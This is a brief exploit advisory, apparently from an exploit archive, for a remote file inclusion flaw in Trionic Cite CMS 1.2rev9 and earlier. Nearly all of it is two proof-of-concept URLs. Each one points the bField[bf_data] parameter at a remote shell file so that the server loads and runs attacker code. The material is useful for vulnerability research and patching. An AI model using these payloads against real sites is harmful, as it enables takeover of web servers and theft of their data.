id: 2192
date: 10/04/2007
title: Trionic Cite CMS <= 1.2rev9 Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

===============================================================
Trionic Cite CMS <= 1.2rev9 Remote File Inclusion Vulnerability
===============================================================



# Trionic Cite CMS 1.2 rev9 Remote File Inclusion Vulnerabilities
# POC :
# /[PHAT]/interface/editors/-custom.php?bField[bf_data]=http://localhost/shell.txt
# /[PHAT]/interface/editors/custom.php?bField[bf_data]=http://localhost/shell.txt



#  0day.today [2023-03-23]  #